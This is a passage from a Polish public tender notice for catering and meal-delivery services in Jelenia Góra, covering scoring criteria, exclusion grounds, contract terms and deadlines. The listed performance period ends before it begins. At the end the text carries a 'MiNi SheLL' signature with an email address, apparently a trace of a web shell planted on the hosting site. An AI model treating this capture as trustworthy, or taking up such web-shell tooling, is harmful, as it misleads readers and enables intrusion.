wykonujących czynności w zakresie realizacji zamówienia, została ujęta w Dziale 26 Tomu I SWZ. <br/>Odległość mierzona będzie (w linii prostej według mapy internetowej https://www.google.pl/maps/) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55322000-3 - Usługi gotowania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <p class="mb-0">55500000-5 - Usługi bufetowe oraz w zakresie podawania posiłków</p> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-06-09 do 2025-05-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	CENA - waga 60% (60 punktów)<br/>2)	ODLEGŁOŚĆ obiektu od wskazanego miejsca - waga 20% (20 punktów)<br/>3)	MOŻLIWOŚCI DOSTOSOWANIA ZAMÓWIENIA - waga 20% (20 punktów)<br/><br/>Ad. 1) Punktacja za Kryterium I - CENA odbywać się będzie według wzoru <br/>(kryterium I dotyczy obu części zamówienia, przy czym każda z Części będzie odrębnie punktowana wg przypisanych jej kryteriom):<br/><br/>(Cmin. / Cb ) x 100 x 60 % = KI<br/>gdzie oznacza:<br/>KI - liczbę punktów z kryterium I<br/>Cmin. - najniższą cenę brutto z przedstawionych (niepodlegających odrzuceniu) ofert<br/>Cb - cenę brutto oferty badanej<br/>Maksymalna liczba punktów za kryterium I CENA - 60 punktów (KI)<br/><br/><br/>Ad. 2.2) Punktacja za Kryterium II Odległość obiektu od wskazanego miejsca (1-500 m) <br/>ul. Bankowej 28/30 w Jeleniej Górze <br/>UWAGA Dotyczy Części II zamówienia: <br/>1)	1 - 200 m: 20 punktów<br/>2)	201 - 300 m: 15 punktów<br/>3)	301 - 400 m: 10 punktów<br/>4)	401 - 499 m: 5 punkty<br/>5)	500 - 0 punktów <br/><br/>OPIS KRYTERIÓW:<br/>- odległość obiektu 1 - 200 m (20 punktów). Obiekty znajdujące się do 200 metrów w linii prostej od wskazanego miejsca, ul. Bankowej 28/30 w Jeleniej Górze, otrzymują maksymalną liczbę punktów. <br/><br/>- odległość obiektu 201 - 300 m (15 punktów). Obiekty znajdujące się od 201 do 300 metrów w linii prostej, ul. Bankowej 28/30 w Jeleniej Górze, otrzymują 15 punktów. <br/><br/>- odległość obiektu 301 - 400 m (10 punktów). Obiekty znajdujące się od 301 do 400 metrów w linii prostej otrzymują 10 punktów. <br/><br/>- odległość obiektu 401 - 499 m (5 punkty). Obiekty znajdujące się od 401 do 499 metrów w linii prostej otrzymują 5 punkty. <br/><br/>- odległość obiektu równa 500 m (0 punktów). Obiekty znajdujące się w odległości 500 metrów od wskazanego miejsca nie otrzymują punktów za odległość. <br/><br/>- Odległość maksymalnie 500 metrów od wskazanego miejsca (ul. Bankowej 28/30 w Jeleniej Górze) jest kryterium wymaganym. Oferta, w której zaoferowany obiekt będzie znajdował się w odległości większej niż 500 m, zostanie odrzucona.<br/><br/>Dokładność pomiaru: Odległość powinna być mierzona za pomocą Google Maps w linii prostej <br/>od ul. Bankowej 28/30 w Jeleniej Górze https://www.google.pl/maps/. <br/><br/>Odległość powinna być zaokrąglana do pełnych metrów zgodnie z zasadami matematycznymi: jeśli wartość <br/>po przecinku jest mniejsza niż 0,5, zaokrąglamy w dół (np. 2015,36 m zaokrąglamy do 2015 m). Jeśli wartość po przecinku jest równa lub większa niż 0,5, zaokrąglamy w górę (np. 2015,56 m zaokrąglamy do 2016 m).<br/><br/>Maksymalna liczba punktów za kryterium II Odległość miejsca noclegu od wskazanego miejsca - 20 punktów (KII)<br/><br/>Ad. 2.3) Punktacja za Kryterium III MOŻLIWOŚCI DOSTOSOWANIA ZAMÓWIENIA (dotyczy Części II zamówienia) <br/>Ocena możliwości dostosowania zamówienia do bieżących potrzeb klienta, w tym zmiany menu, dodania nowych diet oraz regulacji wielkości porcji.<br/>W ramach tego kryterium Zamawiający przyzna punkty na podstawie informacji zawartej w Formularzu ofertowym, w następujący sposób:<br/>Skala ocen (przedziały punktowe)<br/>20 punktów - możliwość zmiany menu, dodania dowolnych diet np. wegetariańska, bezglutenowa, keto, itd. możliwość regulacji porcji w dniu serwowania obiadu. <br/>15 punktów - możliwość zmiany menu, dodania co najmniej 2 różnych diet np. wegetariańska, bezglutenowa, regulacja porcji - najpóźniej jeden dzień przed realizacją. <br/>10 punktów - dodanie maksymalnie 1 diety, regulacja porcji - najpóźniej dwa dni przed realizacją. <br/>5 punkty - możliwość drobnych zmian w menu w tym jednego składnika posiłku, brak regulacji porcji. <br/>0 punktów - zamówienie bez możliwości modyfikacji w trakcie realizacji<br/><br/>Maksymalna liczba punktów za kryterium III MOŻLIWOŚCI DOSTOSOWANIA ZAMÓWIENIA - 20 punktów (KIII)<br/><br/>W dalszej kolejności ilości punktów uzyskane z oceny Kryterium I (Wynik I), Kryterium II (Wynik II) i Kryterium III (Wynik III) zostaną zsumowane, dając wynik ostateczny (SP). <br/><br/>Wynik I + Wynik II + Wynik III = SP (suma punktów) <br/><br/>Tak otrzymana suma punktów (SP) podlega porównaniu w celu ustalenia oferty najkorzystniejszej, tj. o najwyższej sumie punktów (NSP).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ODLEGŁOŚĆ obiektu od wskazanego miejsca</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">MOŻLIWOŚCI DOSTOSOWANIA ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia z postępowania, o których mowa w art. 108 ust. 1u.p.z.p., art. 7 ust. 1„ustawy o przeciwdziałaniu”oraz w art.<br/>109 ust. 1 pkt 4u.p.z.p. 1) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125<br/>ust. 1 u.p.z.p., w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego - zgodnie z treścią załącznika nr<br/>3 do Tomu I SWZ.<br/>Oświadczenie, o którym mowa powyżej składa Wykonawca, każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>2) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 u.p.z.p. o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz.U. z 2024 r., poz. 1616) z innym<br/>Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej – zgodnie z załącznikiem nr 4 do Tomu I SWZ.<br/>3) Odpis lub informacja z Krajowego Rejestru Sądowego lub z centralnej ewidencji i informacji o działalności gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Upoważnienie osób podpisujących ofertę (oraz załączników do niej) musi bezpośrednio wynikać z dokumentów dołączonych<br/>do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny<br/>Wykonawcy, to do oferty należy dołączyć pełnomocnictwo wystawione przez osoby do tego upoważnione. Pełnomocnictwo<br/>musi być załączone do oferty i przekazane w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub elektronicznym podpisem<br/>osobistym <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 12.1	Wykonawcy mogą wspólnie ubiegać się o zamówienie.<br/>12.2	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnictwo winno być załączone do oferty. <br/>12.3	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>12.4	Wykonawcy wspólnie ubiegający się o zamówienie na podstawie art. 117 ust. 4 u.p.z.p składają wraz z ofertą oświadczenie, z którego wynika, jaki zakres przedmiotu zamówienia wykonają poszczególni Wykonawcy – zgodnie z treścią załącznika nr 5 do Tomu I SWZ (jeśli dotyczy).<br/>Oświadczenie, o którym mowa powyżej należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub elektronicznym podpisem osobistym.<br/>12.5	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 22.1 Projektowane postanowienia umowy w sprawie zamówienia publicznego określone zostały w Projekcie umowy, który<br/>stanowi Tom II SWZ.<br/>22.2 Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>22.3 Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 u.p.z.p. orazwskazanym w Projekcie Umowy Tom II SWZ.<br/>22.4 Zmiana umowy wymaga formy pisemnej pod rygorem nieważności.<br/>22.5 W sprawach nieuregulowanych w treści SWZ zastosowanie mają przepisy ustawy Prawo zamówień publicznych oraz<br/>Kodeks cywilny. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-23 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy złożyć przez Platformę e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-23 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com